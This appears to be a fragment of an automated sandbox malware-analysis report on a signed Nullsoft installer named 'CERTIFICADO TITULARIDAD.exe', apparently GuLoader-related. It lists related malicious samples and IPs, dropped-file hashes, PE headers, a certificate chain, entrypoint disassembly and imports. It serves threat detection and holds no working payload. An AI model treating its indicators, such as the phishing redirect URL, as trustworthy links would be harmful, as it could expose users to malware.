                                                                                                    https://topnews.si/revive-adserver/www/delivery/ck.php?ct=1&oaparams=2bannerid=2zoneid=15cb=1215afdebfoadest=https://trunitrisnionw.org/tripmail/treat.html#glenn.turley@steptoe-johnson.comGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.24.60
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    • 188.114.97.3
                                                                                                    CkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    N8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 188.114.97.3
                                                                                                    https://geniboss.com/post/r/Get hashmaliciousPhisherBrowse
                                                                                                    • 1.1.1.1
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adCkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    N8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    NEW REQUIREMENT PO565432.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eSWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    https://t.ly/RpFMVGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 149.154.167.220
                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    • 149.154.167.220
                                                                                                    BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    DDH_LP (1).exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    seethebstpricewithbestthinghappingwithgoodnews.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 149.154.167.220
                                                                                                    37f463bf4616ecd445d4a1937da06e19Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    Request for Quotation 11-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    Rechnung_10401.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    A322mb7u3h.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 142.250.186.46
                                                                                                    • 172.217.18.1
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dllSecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              UMOWA_PD.BAT.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                Payment_Advice.1.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  Payment_Advice..exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      Payment_Advice.1.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12288
                                                                                                                        Entropy (8bit):5.805604762622714
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                                                        MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                                                        SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                                                        SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                                                        SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                                                                        • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                        • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                        • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                                                                                        • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                                                        • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                                                        • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):247546
                                                                                                                        Entropy (8bit):7.775165868876813
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:d7BwnBpYWHokXLq11FnDszRpjbs2G7y/JY993WNp3ld2B2nqjwO5ZH:XwnLhy1d57y/JY73Gp3u4TO
                                                                                                                        MD5:2E83B9E0D6587A2A738AD10CD6245A1A
                                                                                                                        SHA1:6397755840B92712BA82139728F0F94750BB791D
                                                                                                                        SHA-256:CE1D87D840A645BC39017901EDE2C3558E2FEBDF60DF32F53DCA6C2CDB98B816
                                                                                                                        SHA-512:683380F2D8682BFFB2C5F7633430BCF2283299E5B8F99937483E149C8184B9865439BA5F2C1550E2C166A91F7F197895BD93164DDE538262F19468DE3AB950ED
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:..2............*......VV.............TT...............)...^..=......||......................+....................>....0.........l.a.........s.............=.......%..ll..^........................I.......\.####...]].....................77.BBBB...................y.........``..P............. ..................+++++...///.............F....SS.ll............MM..4..............+.W.\\\\............o......eee......:::........__.5............XX......DD.........c..............S.\\\\....................................>>...kk.............--.].......:::.............p..iii...2..d..~..LL...................................................................LLLLLLL...7.........^.v.vv..................~~~....v...bbbb......kkk........q...."""..............t.4....................................................OOOOO.o......Q....E........r./////....O...$................................nn...........S......BBBB......##....-----........www.!...<<.....@.............777..BBBB.....##...........xxxxx.................
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):217693
                                                                                                                        Entropy (8bit):1.2568769892506448
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:W3jDfWkUWdQs8pjm8VS0pzFitQj7pT94NM1+LVBgc4j/WNMvEp/Jj+YHGXl8AhXp:EDi9mwSaG0FZL4eWnJaVD
                                                                                                                        MD5:D319DEE1DD380A038694364E5C241C4A
                                                                                                                        SHA1:23D8E4A31246B7109E47B15A542A2B3C6254F6C3
                                                                                                                        SHA-256:48FBC5AD8CD0917AC1CC21303A71DBEC8DB2F1C4B661C671E6F4A206E46E2059
                                                                                                                        SHA-512:D87830F415785163617B595EC497206D03BD7A94145213D6D5C229F7DCF5BB23431ACFA7836D9CE83D22BEAF6247C38FB814C7F043C81251D2748995D1EF6DB7
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:..5....................7.............................a........o.........................................................]...j......................................................................................................R............S...\.K....r............................F..............................,.......................26.0...............@.........k....................................................6.....................?.........................................................L...........................................................*....................................................................)..............................qe................Z.............................A........................................................................................C.........................t...........;......................................../........................................).................................0.....................4............................
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):274152
                                                                                                                        Entropy (8bit):1.2503859249086189
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:9D11gScZEcDNMK/KGoXVg44JQAL2ii/brvmIqTD6CoH4Uu8edYDWfwVYSJd/nf4s:lnIEcD6jx4uzbmpjUreajz/w6GgCA
                                                                                                                        MD5:EA193DDCF31E973159002C03C0AC868F
                                                                                                                        SHA1:30AC69D5D98C9E8AF409992C979D9AD255D608A7
                                                                                                                        SHA-256:89D7C8FD512783ACF20DF53F71D9880B872195B73C32F1FCE0A1E2EFD3D45E67
                                                                                                                        SHA-512:B62AE757D132605A0EACEAD585E84FEC869C267A1CE20D81461D07202B2FA0059C95CD48FBB1972B253CF6100F9EEBEDA4D1B4FEBB6962FF8AFEC43F9CB88C9B
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:...................C.......................).......................................................................................\.................................M......mi.............................................L.........................w..........Y......V..........t...J....................!.........................................P.......l...............p...................................O...........3................................f......................................d.U..............................................................5..........................og..........................#..........u................._.........................d..............................................................................................................h....................w.........................................................4.....:.................P..........................@.p................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):286409
                                                                                                                        Entropy (8bit):1.2481332878267923
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:9OxTpdn/4S9NFA8NM8EgKbAjRB9UegLnPevzCgr8Xo5zdveLjmJSKXkxQN95LSX9:cx9ZFNxHUznWvtFEKh8MLgo0fFcr71E
                                                                                                                        MD5:A55943689CC6B7EE8E459A1AFDFCE05B
                                                                                                                        SHA1:2985928519A46F842C3A79EDE996E9ABE2E8D3C7
                                                                                                                        SHA-256:D097C5B1B6EF8639EBEEC716CB066281A5ACF092B3BB34F3ACE9A956F6C9DA7E
                                                                                                                        SHA-512:072E1DB70E9B7AD2EDDA3EB81A2A5EB8CC7001944C9172F075A6FFDA176E21AB7C01A1ED835DE6D9706469D06657A823D76FAFC813063BE4E4BB036350001FF8
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.....................A......................................................>...............................................%.............................................................#......X......+...............................m.~....R.................................................................r..........................................-...........,...........................................................................................k................?....................................4.............................................................................................................................._...............................................................k.............................................Y.........y....................m...................................P...`..................................................G....j......................E.......................................................................................'..................
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):429715
                                                                                                                        Entropy (8bit):1.2461114047006094
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:nnYuahRMxG1qUSkDSMtfeAH5HzkdPaSjc3KG1urO6RgTX:gWAj4ZcKG1wtRgD
                                                                                                                        MD5:F7A46B923627A05494904805C17DF7E2
                                                                                                                        SHA1:054BC93F7AA5DE45C75713CE0C20F2958B5D5491
                                                                                                                        SHA-256:2D8196EA307E5201624ADC3FAB7AD30118F6C8CEE5E0AE77654CD60D53CBB826
                                                                                                                        SHA-512:FD6BE38DE11D15B669F9F6779F4CFB2D1E0FF51FBA702C18849D40DAF6D02DC07BD3F420682D1FD328E7C386BA20B5A3E3D803E270CF4639837ECAE3F7B64298
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:........:........................B...............\..................i..............................`.....................R...........................................................................\.........J....................................u.......................f...................o.............v.........n..................................................................A..................V..................A........................................'..........................................1.........................................|..............................4.............p..................Z.......................#............./....................R......................................0.c....l.....................................-....Q..............I.............J................]...............P..................................................................}...........r....................................................Zp.............................D..................
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):390
                                                                                                                        Entropy (8bit):4.241669554313263
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:fzsSRtK7Aw6TKUCOSYWdSccgfNiywAEmv:fI4nbTk7EgQSv
                                                                                                                        MD5:617DD7904D56D99DC3BA5136E927563C
                                                                                                                        SHA1:9CA4E80532384E93EA355D0D6642F9B492FE7BC4
                                                                                                                        SHA-256:0C6E651C361A25F6816FF6F61F39442CB8E32AD772A6A75DE0BDCB24E27553C2
                                                                                                                        SHA-512:15E61D5551C930806A69FFD8581BADD1030D74D8DC54BE934189E4A66001B51F516A1F6306CAD03B4B9A3CB7F07D91E35D47435A179F5118BEAC28C0C47FE893
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:contravention repraesentationen victorians subjektsprdikaternes.truantcy begyndelsesgrundenes roquets mannequinopvisning tidsrammer..storternes decelerates matthus billedbehandlingens spekulationsbyggeriernes bandolqdrs.befathered scoggan demobbing semisynthetic inosculated scenografen energizers..misforstaaende fyringsolie elegiacal.limiterede flaaningens tracheaectasy gosmore barsels..
                                                                                                                        Process:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):399068
                                                                                                                        Entropy (8bit):1.2475416659781264
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:zrG75wPpvSTYHHaneaB1wHKn1uBdcFJF/9uzv1G0SJ8:zrGlUpq2YB1bAdcP+jsR8
                                                                                                                        MD5:B531C99BB63EF96D303FEB92FCF749CF
                                                                                                                        SHA1:5948923E3A23B082CFA348107B0D1C859C537A95
                                                                                                                        SHA-256:12BB81691E9E52C9A7296317D3B2BC7941B1CC995B48E10303D7FF625ABB110D
                                                                                                                        SHA-512:64D47D6A714684B5816B3FCC2963C9DED84F07D6C9F4309406056B7DD245251CF8E310F50B17FA75E35CFDFEC59767F82D0774D409C7E3C6624477A72254E506
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:........................................H............................................V..................E...`....k.F.............+..........................................y........%.............5.j.....s.........3...........o...........................................a................................_..>.......[.......................Q..................................................S...............)............wi..................k.....7.................q..E....................`.............N..........................f...............................a..................................f.................................]...............s..............................................D....................................i....I..................................D..............................................................................................................................................................`..9..n........................i.......{..........v.............3........
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.918021100305666
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:CERTIFICADO TITULARIDAD.exe
                                                                                                                        File size:587'144 bytes
                                                                                                                        MD5:597971be325bbba1df725a7c101a4c58
                                                                                                                        SHA1:90e6b7d6c632cc6fb0d5641ec9b987d5e3387397
                                                                                                                        SHA256:535d29bedc8c720ed7daaeb5e8d79c650b21664d72bad77106eb518975be223b
                                                                                                                        SHA512:ca6f8eab690ab14fcabb7571deba25edeac92bc0167df73607effeec9f1eb680034969b1feda6d62a6002bbea100a4876800bef1d5058033bc7642fc664cf7bb
                                                                                                                        SSDEEP:12288:bXjIKeMQ2PATRg+s/iJplEElhvfTsjzMw1LwKpmkz:bXjIKRQFRC/yTEELD81cCtz
                                                                                                                        TLSH:97C423E263B08493D5332B300D6B59616679BC314B67570F1B59BB1C3C30762EB2BA6B
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
                                                                                                                        Icon Hash:0b2566c125343933
                                                                                                                        Entrypoint:0x4034fc
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                        Signature Valid:false
                                                                                                                        Signature Issuer:CN=Befolkningsgrupper, O=Befolkningsgrupper, L=Carvin, C=FR
                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                        Error Number:-2146762487
                                                                                                                        Not Before, Not After
                                                                                                                        • 06/05/2024 11:32:46 06/05/2027 11:32:46
                                                                                                                        Subject Chain
                                                                                                                        • CN=Befolkningsgrupper, O=Befolkningsgrupper, L=Carvin, C=FR
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:5BDA3AE74C573BD8199ADD861C13E2A3
                                                                                                                        Thumbprint SHA-1:CFBB458189445CBD9B26FD32E0A6FDD75FA2F778
                                                                                                                        Thumbprint SHA-256:D6ABBA61355C4CC1420C82B48DF2757E3FBB2F5DDCBB81F03F52B56F826A4342
                                                                                                                        Serial:7E761DE17F58CF985351A730D8EB501E6B64CAAF
                                                                                                                        Instruction
                                                                                                                        sub esp, 000003F8h
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        push 00000020h
                                                                                                                        pop edi
                                                                                                                        xor ebp, ebp
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+20h], ebp
                                                                                                                        mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                        call dword ptr [004080A4h]
                                                                                                                        mov esi, dword ptr [004080A8h]
                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                        push eax
                                                                                                                        mov dword ptr [esp+4Ch], ebp
                                                                                                                        mov dword ptr [esp+0000014Ch], ebp
                                                                                                                        mov dword ptr [esp+00000150h], ebp
                                                                                                                        mov dword ptr [esp+38h], 0000011Ch
                                                                                                                        call esi
                                                                                                                        test eax, eax
                                                                                                                        jne 00007FDE6C8EF71Ah
                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                        mov dword ptr [esp+34h], 00000114h
                                                                                                                        push eax
                                                                                                                        call esi
                                                                                                                        mov ax, word ptr [esp+48h]
                                                                                                                        mov ecx, dword ptr [esp+62h]
                                                                                                                        sub ax, 00000053h
                                                                                                                        add ecx, FFFFFFD0h
                                                                                                                        neg ax
                                                                                                                        sbb eax, eax
                                                                                                                        mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                        not eax
                                                                                                                        and eax, ecx
                                                                                                                        mov word ptr [esp+00000148h], ax
                                                                                                                        cmp dword ptr [esp+38h], 0Ah
                                                                                                                        jnc 00007FDE6C8EF6E8h
                                                                                                                        and word ptr [esp+42h], 0000h
                                                                                                                        mov eax, dword ptr [esp+40h]
                                                                                                                        movzx ecx, byte ptr [esp+3Ch]
                                                                                                                        mov dword ptr [00429AD8h], eax
                                                                                                                        xor eax, eax
                                                                                                                        mov ah, byte ptr [esp+38h]
                                                                                                                        movzx eax, ax
                                                                                                                        or eax, ecx
                                                                                                                        xor ecx, ecx
                                                                                                                        mov ch, byte ptr [esp+00000148h]
                                                                                                                        movzx ecx, cx
                                                                                                                        shl eax, 10h
                                                                                                                        or eax, ecx
                                                                                                                        movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x7410.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8ec580x930
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .ndata0x2a0000x2c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x560000x74100x760036f3720fbd46b4c3b6a71655ca556f95False0.4803032309322034data5.161063242701895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_ICON0x563580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4134854771784232
                                                                                                                        RT_ICON0x589000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5021106941838649
                                                                                                                        RT_ICON0x599a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5914179104477612
                                                                                                                        RT_ICON0x5a8500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5483606557377049
                                                                                                                        RT_ICON0x5b1d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7414259927797834
                                                                                                                        RT_ICON0x5ba800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.7868663594470046
                                                                                                                        RT_ICON0x5c1480x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.5513005780346821
                                                                                                                        RT_ICON0x5c6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5957446808510638
                                                                                                                        RT_DIALOG0x5cb180x100dataEnglishUnited States0.5234375
                                                                                                                        RT_DIALOG0x5cc180xf8dataEnglishUnited States0.6330645161290323
                                                                                                                        RT_DIALOG0x5cd100xa0dataEnglishUnited States0.6125
                                                                                                                        RT_DIALOG0x5cdb00x60dataEnglishUnited States0.7291666666666666
                                                                                                                        RT_GROUP_ICON0x5ce100x76dataEnglishUnited States0.6440677966101694
                                                                                                                        RT_VERSION0x5ce880x244dataEnglishUnited States0.5310344827586206
                                                                                                                        RT_MANIFEST0x5d0d00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                        DLLImport
                                                                                                                        ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                        SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                        ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
